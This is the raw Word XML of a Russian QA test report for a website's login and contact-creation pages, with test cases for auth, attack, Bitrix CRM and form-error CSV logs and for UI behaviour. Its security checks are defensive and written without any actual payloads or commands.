              <w:t>В CSV есть: Дата и время, IP адрес, User-Agent, Логин, Результат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Формат даты ISO 8601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поле даты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Формат 2026-04-07T15:18:14+03:00 (московское время)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C7513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8C7513">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Формат 2026-04-07T15:18:14+03:00 (московское время)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SUCCESS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Успешный вход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SUCCESS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8C7513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8C7513" w:rsidRDefault="008C7513">
            <w:pPr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SUCCESS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FAIL_PASSWORD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Неверный пароль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FAIL_PASSWORD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02F0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D402F0" w:rsidRDefault="00D402F0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D402F0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FAIL_PASSWORD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Статус</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> FAIL_USER_NOT_FOUND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Несуществующий логин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FAIL_USER_NOT_FOUND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F83AA5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F83AA5" w:rsidRDefault="00F83AA5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F83AA5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FAIL_USER_NOT_FOUND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CF509E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LOG-AUTH-06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BLOCKED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IP заблокирован и повторная попытка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BLOCKED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F509E"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 xml:space="preserve">есть </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>BLOCKED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FAIL_CAPTCHA_MISSING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POST без smart-token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FAIL_CAPTCHA_MISSING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66131E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66131E" w:rsidRDefault="0066131E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66131E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FAIL_CAPTCHA_MISSING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66131E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>LOG-AUTH-08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FAIL_CAPTCHA_INVALID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Невалидный токен капчи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FAIL_CAPTCHA_INVALID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LOG-AUTH-09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FAIL_CAPTCHA_ERROR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Ошибка API капчи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FAIL_CAPTCHA_ERROR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66131E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66131E" w:rsidRDefault="0066131E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66131E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FAIL_CAPTCHA_ERROR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LOG-AUTH-10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2FA_EMAIL_SENT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Первичная отправка 2FA-кода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2FA_EMAIL_SENT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06A36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706A36" w:rsidRDefault="00706A36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706A36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2FA_EMAIL_SENT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2FA_EMAIL_RESENT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Повторная отправка кода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2FA_EMAIL_RESENT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06A36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706A36" w:rsidRDefault="00706A36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706A36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2FA_EMAIL_RESENT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2FA_EMAIL_SUCCESS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Верный 2FA-код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2FA_EMAIL_SUCCESS + SUCCESS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>в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этом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же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запросе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06A36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706A36" w:rsidRDefault="00706A36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706A36">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2FA_EMAIL_SUCCESS + SUCCESS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2FA_EMAIL_FAIL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Неверный 2FA-код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2FA_EMAIL_FAIL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06A36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706A36" w:rsidRDefault="00706A36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706A36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2FA_EMAIL_FAIL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2FA_TIMEOUT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Истёк срок действия кода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2FA_TIMEOUT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BB41D7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BB41D7"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 xml:space="preserve">есть </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2FA_TIMEOUT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Статус 2FA_MAX_ATTEMPTS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Превышен лимит неверных кодов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2FA_MAX_ATTEMPTS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7B1BF1" w:rsidRDefault="007B1BF1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>В</w:t>
            </w:r>
            <w:r w:rsidRPr="00D402F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CSV </w:t>
            </w:r>
            <w:r>
              <w:t>есть</w:t>
            </w:r>
            <w:r w:rsidRPr="007B1BF1">
              <w:rPr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2FA_MAX_ATTEMPTS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Неизвестный статус не записывается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Попытка вызвать logAuthAttempt с произвольным статусом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Запись не создаётся; в debug-режиме — error_log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Разделитель ;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CSV в текстовом редакторе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Значения разделены точкой с запятой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Значения разделены точкой с запятой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LOG-AUTH-18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BOM-маркер при создании файла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Удалить лог-файл и выполнить попытку входа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Файл начинается с BOM (UTF-8 BOM: EF BB BF)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 w:rsidRPr="000F7602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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">8.2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Лог</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>атак</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> attacks_YYYY-MM.csv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LOG-ATK-01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Структура attacks-лога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Довести IP до блокировки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CSV есть: Время старта, IP, UA, Логины, Попытки, Блок до, Заголовки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27109">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="008C7513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27109">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>В CSV есть: Время старта, IP, UA, Логины, Попытки, Блок до, Заголовки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LOG-ATK-02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Список перебираемых логинов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Делать неудачные попытки с разными логинами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поле Логины — список уникальных логинов через запятую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LOG-ATK-03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Корректный User-Agent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поле UA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Содержит реальный User-Agent браузера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Содержит реальный User-Agent браузера, проверил разны браузеры и одновременно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LOG-ATK-04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Proxy-заголовки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Выполнить блокировку, проверить поле Заголовки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 с CF-Connecting-IP, X-Forwarded-For и т.д. или - если нет прокси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LOG-ATK-05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Нет дублирования записи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После блокировки повторные запросы с заблокированного IP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Новая строка в attacks НЕ появляется (just_blocked = false)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27109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127109" w:rsidP="00127109">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>При повторной авторизации новая строка в attacks НЕ появляется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LOG-ATK-06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Время окончания блокировки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поле Блок до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Формат ISO 8601; разница = 30 минут от Время старта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127109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 xml:space="preserve"> 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>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091B80">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Формат ISO 8601; разница = 30 минут от Время старта</w:t>
            </w:r>
          </w:p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8.3. Лог данных Bitrix bitrix_data_YYYY-MM.csv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LOG-BIT-01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Структура bitrix_data-лога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/contact/create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CSV есть: Дата, Пользователь, IP, Компания, ИНН, КПП, ОГРН, ОКВЭД, Адрес, Данные JSON, Битрикс ID, Ответ Битрикс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В CSV есть: Дата, Пользователь, IP, Компания, ИНН, КПП, ОГРН, ОКВЭД, Адрес, Данные JSON, Битрикс ID, Ответ Битрикс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LOG-BIT-02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Имя пользователя в логе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под авторизованным пользователем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Колонка Пользователь = $_SESSION['username']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Имя пользователя в логе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LOG-BIT-03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 полных данных формы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колонку Данные JSON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Содержит JSON со всеми полями формы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Содержит JSON со всеми полями формы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LOG-BIT-04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Bitrix ID при успешной отправке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Успешная отправка в Bitrix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Колонка Битрикс ID заполнена (число)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Колонка Битрикс ID заполнена (число)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LOG-BIT-05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Ответ Bitrix при ошибке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Спровоцировать ошибку Bitrix API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Колонка Ответ Битрикс содержит JSON с error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7B1BF1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007B1BF1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7B1BF1">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Колонка Ответ Битрикс содержит JSON с error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LOG-BIT-06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Mock-режим — Bitrix ID генерируется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mock-режиме отправить форму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Битрикс ID = случайный 6-значный номер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8.4. Лог ошибок формы form_errors_YYYY-MM.csv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Структура form_errors-лога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Спровоцировать ошибку (отправка без авторизации)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 CSV есть: Дата, IP, Тип, Сообщение, Контекст JSON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16F67">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C16F67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16F67">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>В CSV есть: Дата, IP, Тип, Сообщение, Контекст JSON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117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CONTACT_CREATE_AUTH_REQUIRED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POST на /contact/process.php без авторизации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117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> = CONTACT_CREATE_AUTH_REQUIRED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 w:rsidRPr="00C16F67">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LOG-ERR-03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RATE_LIMIT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Превысить rate limit формы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= RATE_LIMIT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16F67">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C16F67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C16F67" w:rsidRDefault="00C16F67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C16F67">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CSV </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>есть</w:t>
            </w:r>
            <w:r w:rsidRPr="00C16F67">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RATE_LIMIT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SECURITY_INJECTION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с XSS-payload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= SECURITY_INJECTION; в контексте — тип угрозы, IP, поле, payload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16F67">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C16F67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C16F67" w:rsidRDefault="00C16F67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В</w:t>
            </w:r>
            <w:r w:rsidRPr="00C16F67">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CSV </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>есть</w:t>
            </w:r>
            <w:r w:rsidRPr="00C16F67">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SECURITY_INJECTION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VALIDATION_ERROR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форму с невалидными полями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= VALIDATION_ERROR; в контексте — список ошибок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BITRIX_ERROR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Спровоцировать ошибку Bitrix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Тип = BITRIX_ERROR; в контексте — ответ API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LOG-ERR-07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117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> FORM_NOTIFICATION_EMAIL_FAIL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Подменить SMTP и отправить форму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117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> = FORM_NOTIFICATION_EMAIL_FAIL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LOG-ERR-08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Контекст JSON валиден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лог и скопировать значение Контекст JSON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JSON парсится корректно; содержит структурированные данные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4472C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</w:rPr>
              <w:t>8.5. Общие проверки логов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LOG-GEN-01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Месячная ротация файлов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имена файлов логов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Имена соответствуют шаблону *_YYYY-MM.csv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16F67">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C16F67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16F67">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Имена соответствуют шаблону *_YYYY-MM.csv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lastRenderedPageBreak/>
              <w:t>LOG-GEN-02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Безопасность CSV-логов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Отправить значения со спецсимволами, переводами строк, =,+,-,@ в начале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CSV не ломается; содержимое читаемо и безопасно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LOG-GEN-03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Логи недоступны из браузера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Открыть</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> contact/login/logs/auth_2026-04.csv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403 Forbidden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74557">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D74557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74557">
            <w:r>
              <w:t>Ошибка 404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LOG-GEN-04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Единый CSV-helper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Проверить, что все логи используют contactCsvLoggerAppendMonthlyRow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Единый механизм записи, санитизации, ротации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LOG-GEN-05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Кодировка UTF-8 с BOM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Проверить любой лог в hex-редакторе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Начинается с BOM EF BB BF; кодировка UTF-8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LOG-GEN-06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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Concurrent write (flock)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Одновременно с двух вкладок отправить запросы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Оба события записаны без повреждений (flock(LOCK_EX))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color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>☐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  <w:tr w:rsidR="002643C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15296" w:type="dxa"/>
            <w:gridSpan w:val="6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43C9" w:rsidRDefault="00C30709">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>9. UI/UX проверки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002643C9">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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ID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Фактический результат / Комментарий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UI-01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Поведение кнопок на логине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Навести курсор на основные кнопки на странице логина/2FA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Hover спокойный, без резких скачков цвета и визуального шума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4ADA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="004F369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4ADA">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Hover спокойный, без резких скачков цвета и визуального шума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UI-02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Адаптивность формы входа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/contact/login/ на мобильном устройстве (&lt; 480px)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Форма читаема, элементы не выходят за экран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4ADA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="004F369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4ADA">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Форма читаема, элементы не выходят за экран</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002643C9" w:rsidRPr="000F7602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UI-03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Состояние кнопки «Выйти»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На /contact/create проверить кнопку «Выйти»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117E63" w:rsidRDefault="00C30709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href </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ведёт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117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> /contact/login/logout.php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4F369C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="004F369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Pr="004F369C" w:rsidRDefault="004F369C">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">href </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ведёт</w:t>
            </w:r>
            <w:r w:rsidRPr="00117E63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117E63">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> /contact/login/logout.php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UI-04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Виджет капчи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Открыть форму входа и пройти капчу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Виджет не закрывает элементы формы, работает корректно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4ADA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="004F369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4ADA">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Виджет не закрывает элементы формы, работает корректно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002643C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>UI-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="358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Сообщение об ошибке после PRG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3302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Ввести неверный пароль</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3911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C30709">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Страница перезагружается (PRG), сообщение видно, F5 не вызывает повторную отправку</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="847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D44ADA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="004F369C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
            <w:r w:rsidR="00C30709">
              <w:rPr>
                <w:color w:val="444444"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Pass  ☐ Fail  ☐ Skip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475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D44ADA">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Страница перезагружается (PRG), сообщение видно, F5 не вызывает повторную отправку</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Итоги прогона</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="15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9296"/>
      </w:tblGrid>
      <w:tr w:rsidR="002643C9"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тестов</w:t>
            </w:r>
          </w:p>
        </w:tc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Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="92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43C9" w:rsidRDefault="00C3070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Skip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002643C9"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4E4505">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="9296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="A8C4E0"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="A8C4E0"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="A8C4E0"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="A8C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43C9" w:rsidRDefault="002643C9"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002643C9" w:rsidRDefault="00C30709">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t>Общие замечания / Критические баги:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C741E" w:rsidRDefault="003C741E">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afb"/>
        </w:rPr>
        <w:t>Рекомендации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Для формы авторизации на странице /contact/login/ </w:t>
      </w:r>
      <w:r w:rsidR="004A4162">
        <w:t>реализовать</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запись в лог form_errors_YYYY-MM.csv.</w:t>
      </w:r>
      <w:r w:rsidR="004A4162">
        <w:t xml:space="preserve"> сведения об атаках и rate limit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="002643C9">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="002643C9">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002643C9" w:rsidRDefault="002643C9">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002643C9">
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9"/>
      <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="72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9A4" w:rsidRDefault="009229A4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009229A4" w:rsidRDefault="0092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709" w:rsidRDefault="00C30709">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="4" w:color="2E75B6"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>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9A4" w:rsidRDefault="009229A4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009229A4" w:rsidRDefault="00922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709" w:rsidRPr="00117E63" w:rsidRDefault="00C30709">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="4" w:color="2E75B6"/>
      </w:pBdr>
      <w:spacing w:after="80"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>QA Test Report: /contact/login &amp; /contact/create</w:t>
    </w:r>
    <w:r w:rsidRPr="00117E63">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">     </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Статус</w:t>
    </w:r>
    <w:r w:rsidRPr="00117E63">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:r w:rsidRPr="00117E63">
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">☐ </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t>Пройдено</w:t>
    </w:r>
    <w:r w:rsidRPr="00117E63">
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  ☐ </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t>Провалено</w:t>
    </w:r>
    <w:r w:rsidRPr="00117E63">
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  ☐ </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t>В</w:t>
    </w:r>
    <w:r w:rsidRPr="00117E63">
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t>процессе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E4560"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="518600D4"/>
    <w:lvl w:ilvl="0" w:tplc="2A08F7D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="88B05B76">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0FB63EC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C9E87ADC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C1A42294">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D17AEF06">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="77C40248">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DEC4B602">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E5FA47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3C9"/>
    <w:rsid w:val="00025F9B"/>
    <w:rsid w:val="00091B80"/>
    <w:rsid w:val="000F7602"/>
    <w:rsid w:val="00114506"/>
    <w:rsid w:val="00117E63"/>
    <w:rsid w:val="00127109"/>
